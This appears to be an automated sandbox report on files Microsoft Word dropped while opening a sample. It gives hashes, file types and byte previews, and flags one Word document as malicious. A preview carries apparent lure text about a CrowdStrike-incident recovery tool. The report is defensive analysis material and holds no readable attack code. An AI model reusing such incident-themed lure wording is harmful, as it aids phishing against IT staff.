    SSDEEP:768:VQ++TcRGfH5eNodvzDnMex2FzuOojrl+X4H+91i57BR/SUcKkuMw2D:cTmQHICzA7ijrlZ+9g57BZSUcKk5ww
    MD5:437A5A184681BCFC608FD1E97D708616
    SHA1:7D84FBE6D4DED5A3C98414F458CE071BBC9035BB
    SHA-256:D1F0B68D87F6B09555851C30F0352A07952B5B0885EFB8D3E3FF5CEE4279E87B
    SHA-512:6B2D7542117A4F4DA956CB7EF4C09F69728F793C0DE6BAAC6790F73E923600EABA0FC54D1C7082483244EF1DA0246158C69143CD297FA08131B302AAD04B5003
    Malicious:false
    Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:9ddd68a3-599c-c447-b762-dfdcc6ed67f0" xmpMM:DocumentID="xmp.did:6DA3B3432F9611E79EC5C8FB588A0A7D" xmpMM:InstanceID="xmp.iid:6DA3B3422F9611E79EC5C8FB588A0A7D" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:171e06c7-6010-1747-9ee0-2032452c22f2" stRef:documentID="adobe:docid:photoshop:647e5738-1e35-11e7-9c56-d2f51c83e137"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 540x540, components 3
    Category:dropped
    Size (bytes):51762
    Entropy (8bit):7.969551469107947
    Encrypted:false
    SSDEEP:1536:2RjFVIGWSX55YGjQQq35KuAt85LMn7Tz+dR8jG/t:2RhVIiiWQ9sxnLGR8jG/t
    MD5:B3DB04E08D530D82F33A9B09EA528595
    SHA1:C503E80D02BACAC44C1E53D2C2289F5702B0C829
    SHA-256:35711A8D24732AEB50300EACD3E231BFD5676D6575830240BF7111BFF040B9E5
    SHA-512:C6B66DC04793FFAD8C7CEE1908334C664D122B6D444B8ED534E20E5FA3A7ED22062697C759BD8236910BD5E88D321D11C4BAC7EF40B64E3E69620AA7AEF26B1D
    Malicious:false
    Preview:......Exif..II*.................Ducky..............http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:bbfa45cd-c1f9-7e4b-bdf0-5a08d3643b82" xmpMM:DocumentID="xmp.did:7E9BDF902F9611E79068964DF66B6A5F" xmpMM:InstanceID="xmp.iid:7E9BDF8F2F9611E79068964DF66B6A5F" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:bfdf1a42-cec7-c342-962a-2f28aa7f0712" stRef:documentID="adobe:docid:photoshop:21012dab-1e31-11e7-9c56-d2f51c83e137"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x540, components 3
    Category:dropped
    Size (bytes):77636
    Entropy (8bit):7.98325572479678
    Encrypted:false
    SSDEEP:1536:GQvLaOfOKaf5ZKLzFxDZsDYlV4uCD258Vds+7RWiakyvggK:mOOKahZoZqY+uDCVe+Aizye
    MD5:DEE12646BC7E105B3A97555A5AD46F1F
    SHA1:D3C1F8FAFD06682514F2A88B5DD4B2D0BB1C9D0A
    SHA-256:F47061DFB3F3312AF65E739C09EF51B0F0C2DE21FDCD344C35B5E9C37665CFD2
    SHA-512:3A94C1975B50995BC368376423203F072417C83C4A65312122C0258075EFA6C0686D01A4B9CEF67D30012D0509DBA69D03921E9E6A6171C1F9E52690D5C2CF7B
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 540x540, components 3
    Category:dropped
    Size (bytes):42587
    Entropy (8bit):7.956158176110853
    Encrypted:false
    SSDEEP:768:33uVCSrPcSrBbXGFz+dT+YrUjmJ3/Tm14bFXBFfP+EIbeIIoAuYY4so2/EKchzum:33uV74StXhSYrUiJvTsCNjNIbz6pAEKk
    MD5:481D6C397EC9255C7158948ECAEE6585
    SHA1:F6692C7064A6E54991283963DA5190C179753D19
    SHA-256:EDE39E66268900159B6B80106B11EF74539F5077D8206DEEAD9B98E8F3CFD176
    SHA-512:5B4BC810879E55F712E0E860FB4D4ADE54297DC574C1658CD3E61EDC8D0AAD9B0EFED16EAA347B663F1271207BD2B858B8644B333BE98CFB0C6536279A8950BE
    Malicious:false
    Preview:......Exif..II*.................Ducky..............http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="adobe:docid:photoshop:cf966bc7-2e03-1179-b805-d8edc999fcb6" xmpMM:DocumentID="xmp.did:9328F00B350711E7AC20BD1A5FC75C1C" xmpMM:InstanceID="xmp.iid:9328F00A350711E7AC20BD1A5FC75C1C" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5BC0E725279811E7BFED96D58044CBC1" stRef:documentID="xmp.did:5BC0E726279811E7BFED96D58044CBC1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................$..$-"."-)#""#)8/////
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x540, components 3
    Category:dropped
    Size (bytes):38755
    Entropy (8bit):7.969372339631151
    Encrypted:false
    SSDEEP:768:xIw5we0JUmH9lDEt7ABvuRYLZ2CjOkqwP6HtSbIDNEaP2bu4:xIeweU9uABvkYLZ2Cj5PhIefu4
    MD5:D1895189ECEEF4679EAA001B3F779DB3
    SHA1:FC4AAA7A7F84C806F042A80E1F90B8E7236A8559
    SHA-256:3D832CABF1C0DAAA5314F32A8E412E36F5628F6D2A14A021901D667773B382D3
    SHA-512:E44A6E7AA7E2BEE1C1C5635AC255BBCB361D2532A4169F0D1F757EBBAA384B11B1635D932CD44E1748821459F53B81EF79B6642080C77F41BC4D93C8B73F312E
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JSON data
    Category:dropped
    Size (bytes):8515
    Entropy (8bit):2.376758026536063
    Encrypted:false
    SSDEEP:192:OGEGGGBGcGSGwGdGKGjWqGjWUGjW3GjWiGjWAGjWUGjWTGjWwG/zhGzPhGjf4:zJbwx3F8f02FU+UJiUsk
    MD5:53D49444EAF92E0CF5D2985CCAEDE42B
    SHA1:DA2D6C55752243AA5E638750F038DADF3C9FE6CC
    SHA-256:722A39658D2F3D5E333874F23485CEA9DA2B79EDA454FA7F5A9FEFBFDB9B2AD8
    SHA-512:B59D16AE8DCB2D9F02BF7CD594A94D140C9CB308DECFEEDF89B9C166657D8B6BD97FA7CFCF97F0D45E184A470B209F28F1ECC420C5CBF8D88D6E0E1C3AB48064
    Malicious:false
    Preview:{.. "MajorVersion": 1,.. "MinorVersion": 5,.. "ResFamily": [.. {.. "Family": "InkEffect",.. "Res": [.. {.. "n": "inkeffectrainbowglitter",.. "sub": [.. {.. "sn": "",.. "sid": 0,.. "ext": "jpg".. }.. ].. },.. {.. "n": "inkeffectgalaxy",.. "sub": [.. {.. "sn": "",.. "sid": 0,.. "ext": "jpg".. }.. ].. },.. {.. "n": "inkeffectgold",.. "sub": [.. {.. "sn": "",.. "sid": 0,.. "ext": "jpg".. }.. ].. },.. {.. "n": "inkeffectsilver",.. "sub": [.. {.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):2278
    Entropy (8bit):3.844562966056304
    Encrypted:false
    SSDEEP:48:uiTrlKxsxx8xl9Il8uFFViLgYbWmrF7qld1rc:vQYZVicYbWCF79
    MD5:8DD4EE04D7AE71479C85CADB883C8A89
    SHA1:CDA4C6A6E52E90900E8463E952DD8E63FF67D072
    SHA-256:B556853174CF0717396ABA6729FB0B46C742C5BC85BA7F44485392A5F7BBE423
    SHA-512:2C7ECAEC26AA6CF55AFC8D13DEA7E853C8AE9EB16B7E99B8526F7288D0BCA92BED140B41142ABF20307B575F1FDA674EC6FB79FF69372CBC6975FD977F541C62
    Malicious:false
    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.I.0.+.g.U.f.c.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.0.i.K.n.x.M.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):4542
    Entropy (8bit):4.005734687659148
    Encrypted:false
    SSDEEP:96:pYZV/8ktGoZ16N27JN30Nc7Q2QEzakdug6/e:p20kkoZ16NCNZQ8vduJG
    MD5:7A1379196918073CB3372B4DECE216FB
    SHA1:345BCC6C6CEF61268F6D22625DD457677ED9EE1C
    SHA-256:A604069536EA8FBB617CFC8DB42C01FB2F5A5D2A5A4320181C33A05803A4AC71
    SHA-512:FE8ECE6FD4430AD2D05C24E0D6A63BAE1A2E925F26B0369724FEA21C67AF19B511D9B0DBFE01848DDF13E69DE4599D45B73F76D9B9A5CBBB6D25C0B27BEFBDAE
    Malicious:false
    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".k.r.R.S.Z.z./.c.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.0.i.K.n.x.M.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x518, components 3
    Category:dropped
    Size (bytes):79621
    Entropy (8bit):7.949654755512444
    Encrypted:false
    SSDEEP:1536:EJJt5rmggmHt1zVpigR5lV4Bj1yh0/fakUhx4ZnfO8gf:EJJ3mg9/zVpigR5lw1HabP4ZfOx
    MD5:54A07C35DADB508F554F0ED25AA155B3
    SHA1:84FAC4D81E2AF4E920E4971F8A5D53AC4A8C6BDA
    SHA-256:94EE01362EE9EE7E61A1A62BD197CFF851A64B1DE02AAFE24C1E0A464E4A6036
    SHA-512:D9550DA2511C031F863C6DBDBEBE09E58E3DB74BC7EB564BF7667F8C8F12A55C155092074EDC2FF66AEA6AB7EF630E6625D7F50B68F4EF3215858A407F5320E1
    Malicious:false
    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 837x754, components 3
    Category:dropped
    Size (bytes):66364
    Entropy (8bit):7.930881392262679
    Encrypted:false
    SSDEEP:768:UYytYytYy/OGTWD1qufcR9kyKfMhzEQnsi0Bm4/eevUAGEdUBS00dWX4VLZG:UJJLOGxJDiUiQnR6m4WAUEdUkgXM1G
    MD5:FA62B61B2E012E56787AD09FF660B32A
    SHA1:32F29245140B72BD99D4C42408EDA9DFE4F088CC
    SHA-256:643C921D41C123EB27A5BED51AF0F611EA7ECB4EFD3A5FA34DE8FFBC8F5781FD
    SHA-512:FB7145BAC331C9A246C49D1E9854398CF65DF6B023BC0E3448A10A4759FB6DA8D60D90316E29991FDE559D0E43A1D5BB5EA3D5837F284DEA3B9EED0143A1D3B6
    Malicious:false
    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................E.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 838x340, components 3
    Category:dropped
    Size (bytes):44995
    Entropy (8bit):7.9304820357792645
    Encrypted:false
    SSDEEP:768:QYytYytYyziJ6D4TnrTn8zbDRrjzQLpFDSsgwpfw+6+i:QJJXiJ6DYrkLQ1Fhdpo+6+i
    MD5:D76D9D62CD9BDB3201F8B08A60DDD681
    SHA1:A0A5A65424C08AD3C165B72DCC790F5682149DA2
    SHA-256:5B00B1362C95117CC1FBD59F3248ACF3F4DFE6F86D11999ECDEE9458F04E17E9
    SHA-512:2890D8218157B84D477D48772DE2FF81CE363EF3A1535CA5D3E2AEE48381EAD18C59827E944E127EED0412F317B9825CBB5AEF9CFAD953B0F20F8D720B10B121
    Malicious:false
    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................F...........T...........ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x744, components 3
    Category:dropped
    Size (bytes):74268
    Entropy (8bit):7.9444839660162145
    Encrypted:false
    SSDEEP:1536:KJJ9JA6k9NJBwEQVuIeFVfm5iQmeDDRx/XBdRbX1o/:KJJ/uBw0FV+5iQmeBx/xdRbX1o/
    MD5:45C59288E77195B7C14579CD59717986
    SHA1:AEF3C27DB85493C0E85CAD04E301C092640E7684
    SHA-256:C4AFC369DC15759D81E8563052CFDA5D04EF6B7F76177EB01AA4C2695CB1486F
    SHA-512:7B1F375175780FC5864FA67C1CE64A885B471678EF2D966B00107AE3FBC1649EDE1388BC5F382A002105FC2F624DA230C64D21F005DA79D4EE9B7C20B5764BDE
    Malicious:false
    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft Word 2007+
    Category:dropped
    Size (bytes):250145
    Entropy (8bit):7.9935463566733125
    Encrypted:true
    SSDEEP:6144:m00BJM20XF07Jtd0YPFKGTFHLYwgNkSagBRK3WJMLtFqFk06TOOp7uuVZpVPvG:wBJUXydtdfogBLngNMVG6xFqJ6TOOdur
    MD5:891E6C7EC5DE6384509564D8A0DEDECF
    SHA1:187994C9D8A21DD977473EF8E7A6EF4C7F2EAE52
    SHA-256:1E224B11854CE62115305CE613169DAD1C4AA59D35C8482E979532ADCA124A10
    SHA-512:27D6EF69B33A4F363E3D939EA4988A477B09F40401FF7645A6D7AA2ABDB9F7AD329C6A70B50996F27789164E5E2E4A41C12B3BACD2FB2B4EAC9486C00AD4D7E8
    Malicious:true
    Antivirus:
    • Antivirus: Joe Sandbox ML, Detection: 100%
    Preview:PK..-.......!..am.............[Content_Types].xml.......................n.0.........D...(,...6@. W.Z.t...k'~..-Eh..tj.b.".Y.....Yw..|P.l^.X.F.Z..d..../,.(L-:k.d;..z....~. d.6.d+D... W.E(..C+..Z ..-wB..-.O..g..A0.cd.......0.}..}.J..}..E....:%..2...!.M.$..J.y......[...L..f.= ..D......R....r.6.p.+....Oj.W5dw....i......M..8f8.()F....[#..hU(s.r....(.a6(...&.....AS.].......w`.m.F.xT..........{.9o%.@8..#:.".p..=7m..$.".@NFx...d)..'.4..8E7Ft2..z../.d........z..} .8....N.@...=.$..c..s?....Q.....;i....>.>..[..{...}....9...,.. ..PK..-.......!..U~............._rels/.rels......................MK.1....!.;.*"..^D.Md..C2.........(.....3y..3C....+.4xW..(A.......yX.JB....Wp.....b..#InJ......*.E..b.=[J....M.%...a .B..,o0.f@=a... n........o.A..;.N.<...v.."...e...b.R...1..R.EF..7Z.n...hY..j.y..#1'.<....7.......9m.......3...Y.. ..PK..-.......!.qq..............word/document.xml....m.......2(.......}.n........^..-.N.3I QT.M..hw.9@..E...S$./.}...;.... .G.'..*R..v.@-+.A
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):81920
    Entropy (8bit):4.099210753349057
    Encrypted:false
    SSDEEP:384:XtT+CgCz8l15lZzNKY235JzN0jyLUtT+DCz8l15lZzNKY235JzfN0jyL:6Ca/lZzNj235lNdZCa/lZzNj235lFd
    MD5:400C84541516D75316906A9716BE824C
    SHA1:B5CDC0ED9EF4354FB41237439FE682E5A082692E
    SHA-256:E4718B7F3CF08AD696781B66DB4D1E84A7A6AE253BCFCDE4066CF02756EBBABA
    SHA-512:DDB320F30F935FE4328503D3F19431CF036ABCCF30E6CF195AC03D8161007A1D21365E664AC06827119A7864671BF2AE9339FD42D7BFBA6ADA0A9DD65BB1544A
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1536
    Entropy (8bit):1.5093262897962565
    Encrypted:false
    SSDEEP:6:mEMEEEe9lCgKRAElAtsArA1klAHdtckxr/Dx:IYP/l/uH6x9rx
    MD5:98F7DF0146DA5D1C46C6ABF7D49ECD62
    SHA1:289E7FFF84BB3843BC652C1FF357CCEA960DAD2F
    SHA-256:D5291DE37D4EFC109AB4052527CE3012DF209FB1672F0CCF61A4578B740A73C0
    SHA-512:5E1D10067BFE38827433374C11C061F026BA80A9F5192CFF21155E99DB0699B8EB8B0C224FB277F7F9CC6E30BCD2779DCF66EAC99302CCD2CA0260DF93BF0DBC
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):43596
    Entropy (8bit):3.6705361254320246
    Encrypted:false
    SSDEEP:768:6kDl9L3AFPz4qrkv8RkaOIvWRLjCOojE1iRUSlV8ivuCDSle3H0XJ44:pDlV3ABz4Ykv8RkaOIvIPCOojBV8CuCQ
    MD5:814BF7F93B5683057A1729EA1FAE060E
    SHA1:BE861A93A83D93F7D0076A62A3B891525F17BCFD
    SHA-256:AC3B70A9AD0902B84A32390D07C75C4113600164F60C556EA6E54238FF3C1DF6
    SHA-512:95A86E91C7808AC3DFB07FC104DEAAFF482C50F005BB9E651D3AC423B04D850592F4CC7C5D54F2B9C0DAC045C889DC6CFC7090AB8C4A8B7AEE5FA842A0BBAD8D
    Malicious:false
    Preview:..................................A.s. .a. .f.o.l.l.o.w.-.u.p. .t.o. .t.h.e. .C.r.o.w.d.S.t.r.i.k.e. .F.a.l.c.o.n. .a.g.e.n.t. .i.s.s.u.e. .i.m.p.a.c.t.i.n.g. .W.i.n.d.o.w.s. .c.l.i.e.n.t.s. .a.n.d. .s.e.r.v.e.r.s.,. .M.i.c.r.o.s.o.f.t. .h.a.s. .r.e.l.e.a.s.e.d. .a.n...u.p.d.a.t.e.d...r.e.c.o.v.e.r.y. .t.o.o.l. .w.i.t.h...t.w.o. .r.e.p.a.i.r. .o.p.t.i.o.n.s...t.o. .h.e.l.p. .I.T. .a.d.m.i.n.s. .e.x.p.e.d.i.t.e. .t.h.e. .r.e.p.a.i.r. .p.r.o.c.e.s.s... .T.h.e. .s.i.g.n.e.d. ................................................................................... ..."...........L......................................................................................................................................................................................................................................................................................................................................................................$..&..F...d......d...d.-D..M............[$.\$.a$.gdK.e.....$.-D..
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1536
    Entropy (8bit):1.5093262897962567
    Encrypted:false
    SSDEEP:3:ml+lGl+l+l+l1PPPlLlAytl7lhlJvl5hzldlxpxl/b1l/pl/Ppl/Rl/5bhlll/tB:mEMEEEe9lCgKCkgA9P61Y
    MD5:92AC86FA3C6B284A98F00F49FDCACB49
    SHA1:EBE19354C0CB86AEEA9525A3472CCECA8A313EBC
    SHA-256:B7B29D8BC27DF9FAD485B4E802BDA6C39C14DC4CF3A9FB9B577E44219A61D9E7
    SHA-512:6B47784EDD2E57F5774CEEE86747899CABBFF7AED2623F849872A47B8AF842F1EE4FEF8A7494D95C373F1D8D5C9F2E78E099F515252377BBB7E5DBD8A8E4AC2A
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:ASCII text, with very long lines (10173), with CRLF line terminators
    Category:dropped
    Size (bytes):30125
    Entropy (8bit):5.477074988936344
    Encrypted:false
    SSDEEP:768:6CT+8jVZqN+uwTICQPwWoIIRgQazes1tDjjnnBFAmilMwtIffmz:6CT+8jVswuWICMwWoIIRgtes1tHrnBFq
    MD5:767677ABAE05CEE23150528539A949DB
    SHA1:5DEF58A91E987CC718FB51186F58CBE25EEA5E99
    SHA-256:0EB1169E0391AFBEA5244963F7ECB56B04BBE47CF090F1E561FD5508CEAFCBEA
    SHA-512:A22A4837D13628894020D596FFD1A6CA3A596C81990B7C6B61D120DACB58F1F387921D6F9F95C5642FA1CCC6A04FFF7B51A903BB55FFE05F719DBF68EEB6ABDC
    Malicious:false
    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..07/22/2024 13:57:40.364.WINWORD (0x86C).0xC24.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-07-22T13:57:40.364Z","Contract":"Office.System.Activity","Activity.CV":"GOns7eqi3EmkFERUd6TzfQ.7.1","Activity.Duration":1309,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...07/22/2024 13:57:40.364.WINWORD (0x86C).0xC24.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":24,"Time":"2024-07-22T13:57:40.364Z","Contract":"Office.System.Activity","Activity.CV":"GOns7eqi3EmkFERUd6TzfQ.7","Activity.Duration":3803,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureDiag
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:ASCII text, with very long lines (28929), with CRLF line terminators
    Category:dropped
    Size (bytes):20971520
    Entropy (8bit):0.19469915830844212
    Encrypted:false
    SSDEEP:1536:8oMF0cgFWeIuTT5jpzo+cBwBuJG9/juQ6hzqBJJsjrDvWl0UOp+cqe29zjWnvj+d:Bc7eIU3o++w6Cfjl
    MD5:651F2829FBA04A38F048069D9C6A2F71
    SHA1:732800B964AAC1EC0362C60B934CD1F0826C1659
    SHA-256:11C95D2AB3FBD174034CF0229C2A325D3FA103E045A587695AD16E02F5FEB5A2
